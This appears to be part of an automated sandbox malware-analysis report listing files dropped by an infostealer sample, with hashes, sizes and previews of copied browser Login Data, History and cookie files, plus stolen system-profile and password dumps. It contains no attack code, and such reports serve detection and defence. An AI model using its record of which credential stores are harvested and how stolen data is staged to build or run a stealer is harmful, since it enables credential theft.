                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\eVceOGHlj6zoWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\kgxQgTh5UQ5GHistory

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                        Entropy (8bit):0.7373485529776095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ISby5bHgtH+bF+UI3iN0RSV0k3qLyj9mJz:YlAtIkUI3iGRE3qLO6
                                                                                                                                                                                                                                        MD5:6E23040642D39AE5B8BFCF488BF08AEC
                                                                                                                                                                                                                                        SHA1:F8AADA3F00165FEB51AB2021906289C73216E572
                                                                                                                                                                                                                                        SHA-256:C2CD94B96B62B72BC989CB7C266FDA787FFA6BFB57B80A2976FE39EBD1F8C786
                                                                                                                                                                                                                                        SHA-512:46D9DEC9D1532B0800EEF979EF213C94652ABE7FF212B783E7E45D0F91E5D48D879FD3F0E2D2BBEA9AB78EE0F4D217BA0F8CCD19F757703E9B1E4FFC8CD63473
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\vEkSARep5ViMLogin Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spano6nZvZGi7n6F\yiASaL1tzNLxHistory

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                        Entropy (8bit):0.7373485529776095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ISby5bHgtH+bF+UI3iN0RSV0k3qLyj9mJz:YlAtIkUI3iGRE3qLO6
                                                                                                                                                                                                                                        MD5:6E23040642D39AE5B8BFCF488BF08AEC
                                                                                                                                                                                                                                        SHA1:F8AADA3F00165FEB51AB2021906289C73216E572
                                                                                                                                                                                                                                        SHA-256:C2CD94B96B62B72BC989CB7C266FDA787FFA6BFB57B80A2976FE39EBD1F8C786
                                                                                                                                                                                                                                        SHA-512:46D9DEC9D1532B0800EEF979EF213C94652ABE7FF212B783E7E45D0F91E5D48D879FD3F0E2D2BBEA9AB78EE0F4D217BA0F8CCD19F757703E9B1E4FFC8CD63473
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\trixyR5OV7OYq0nWL\Cookies\Chrome_Default.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):530
                                                                                                                                                                                                                                        Entropy (8bit):5.999391385907715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
                                                                                                                                                                                                                                        MD5:06ED2CD304730F55A5C7001509E128BE
                                                                                                                                                                                                                                        SHA1:49651485B2CE3D239172BD52BF5A265AB3EB8E18
                                                                                                                                                                                                                                        SHA-256:66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
                                                                                                                                                                                                                                        SHA-512:0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\trixyR5OV7OYq0nWL\information.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6044
                                                                                                                                                                                                                                        Entropy (8bit):5.358609262874232
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:xfaAgZRyxc2KBhA6tsxODsuz7stAGPhJODtImb8PyRe8cEI3c5Tlb/QdquAukMPD:x4YxX6tsxPuO1B
                                                                                                                                                                                                                                        MD5:49DF0B1B855E249204D567C7AB6A7F71
                                                                                                                                                                                                                                        SHA1:38A3CB7803FFF4D320973BDCC63242447B4CF611
                                                                                                                                                                                                                                        SHA-256:926F68BB5963FD4C9A919FEC1770505BF153C4B119BBC4F49E5BEBB0D2312C2C
                                                                                                                                                                                                                                        SHA-512:78BC85B87A7788953329662332FBD22E3381269BCA81776F4B3684B2BB30BE5ED05906C04E6EE2B0CC8730DDA924C1575497B7381A723FA8DA2BA8422A6D87D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:Build: bladak..Version: 1.9....Date: Tue Apr 23 21:34:24 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 36378f5187071de74b297841946417f8....Path: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixyR5OV7OYq0nWL....IP: 89.187.171.132..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 932923 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 23/4/2024 21:34:24..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\trixyR5OV7OYq0nWL\passwords.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                                                                                        Entropy (8bit):2.518316437186352
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                                                                        MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                                                                        SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                                                                        SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                                                                        SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\trixyo6nZvZGi7n6F\Cookies\Chrome_Default.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1060
                                                                                                                                                                                                                                        Entropy (8bit):5.999391385907715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:KauS79Gr4iSllJALQZ73auS79Gr4iSllJALQZ7c:KauS7GAfJUu73auS7GAfJUu7c
                                                                                                                                                                                                                                        MD5:C0ADF7485C183F86B6E5146BBCAD794B
                                                                                                                                                                                                                                        SHA1:1F31AF65C794F1C146C90F710035734C2D309AE6
                                                                                                                                                                                                                                        SHA-256:B9DE707D979A9939290146CBFD7769E6121A43BCCF04ED0731C6108F47577CE6
                                                                                                                                                                                                                                        SHA-512:E23D818BC20E47A8183F4B6AA2CE79B72CFF805ACC6BAAFCB009F372FD8F498522340EEC54621A8A219A8DCE019308137774ABFC35AE15941869B85BA7FA8085
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpB

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\trixyo6nZvZGi7n6F\information.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6124
                                                                                                                                                                                                                                        Entropy (8bit):5.351936234031666
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:xf7vZRy+c2KBhA6tsxODsuz7stAGPhJODtImb8PyRe8cEI3c5Tlb/QdquAukMPEN:x9Y+X6tsxPuOmB
                                                                                                                                                                                                                                        MD5:2A201E1A166EF474F829C85E22B67841
                                                                                                                                                                                                                                        SHA1:4775C5D81A656D25954FA8F3645BB57B9ADEE0BE
                                                                                                                                                                                                                                        SHA-256:B6CC874EAF58CEC3241E4E3AC5696084A4AACF8EFC0EC41B95A15C99F4AC54DB
                                                                                                                                                                                                                                        SHA-512:2D3C4EF445740ED392F2B586E8FC1B058AB83B127466C9AFEDD8AE5131679B34FB814ECBC77DB587392F6F14430D5A7EB03E758A73D0028D421DAE1AB63064BA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:Build: bladak..Version: 1.9....Date: Tue Apr 23 21:34:34 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 36378f5187071de74b297841946417f8....Path: C:\ProgramData\MPGPH131\MPGPH131.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixyo6nZvZGi7n6F....IP: 89.187.171.132..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 932923 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 23/4/2024 21:34:34..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\trixyo6nZvZGi7n6F\passwords.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                                                                                        Entropy (8bit):2.518316437186352
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                                                                        MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                                                                        SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                                                                        SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                                                                        SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                                                        Entropy (8bit):3.9773432858804916
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8GB42dSOTyKxRbHjidAKZdA19ehwiZUklqehNy+3:8GBtj5qy
                                                                                                                                                                                                                                        MD5:3063A85E5F0AEF5E16562A046E0D5A81
                                                                                                                                                                                                                                        SHA1:199817E61662D96D00394569F3889B8720C27543
                                                                                                                                                                                                                                        SHA-256:7E17DCF8CBE4E115A4B02318D33B7DF8D05948941CF871004660F922F3FF6973
                                                                                                                                                                                                                                        SHA-512:30A69C77EBBD486A5F19D5D0B29AAF30C1E329A68D02061F6D0856A1C88D6DCB61756C6166C05D0DAD1D5D43AF2075B92272DF9253F234020488E336B0A8D76F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,....A..6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                                                        Entropy (8bit):3.9944176996105787
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8O2dSOTyKxRbHjidAKZdA1weh/iZUkAQkqehay+2:8fjr9QDy
                                                                                                                                                                                                                                        MD5:3BE8842F42F8EA13D0C6E6F8D6FD3323
                                                                                                                                                                                                                                        SHA1:B2659CAFA9BE905103374A3937B94DC51D94085C
                                                                                                                                                                                                                                        SHA-256:7B5EF141C83819D0C2E135B48A53AAA6C276E1E013F3BC4093FD51CF4560E349
                                                                                                                                                                                                                                        SHA-512:2F393F092A77DDB8EAF1956FDFD14B4F6814FC7AEDC4D878810D81CE77BFB773B54653D7E22500A48B4E0A61B393FE0F936476BEE30DA3935BCC5543B034C22D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....v6....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                                                        Entropy (8bit):4.004557087724535
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8xV2dSOTyKxRsHjidAKZdA14tseh7sFiZUkmgqeh7sQy+BX:8xMj2nuy
                                                                                                                                                                                                                                        MD5:C76858F63CB9E6D1BB6DD39AA269E3CB
                                                                                                                                                                                                                                        SHA1:6AD2C96E0D8E1AA8E8CE8FC97D1C423DC60212C3
                                                                                                                                                                                                                                        SHA-256:113DEA87E28FA7F29CCEE0915527C484B2890305FC32788C5319A272DF55D933
                                                                                                                                                                                                                                        SHA-512:240502C7488AF9FE4F554D972D83C4CBA9EE622ECC709FFE6C1C11695A6E6B597A2B99F913D96C46CE5B9297F5662D7906E85605765428DED63A6CE9B77C96B6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XC.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............P.{.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 18:34:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
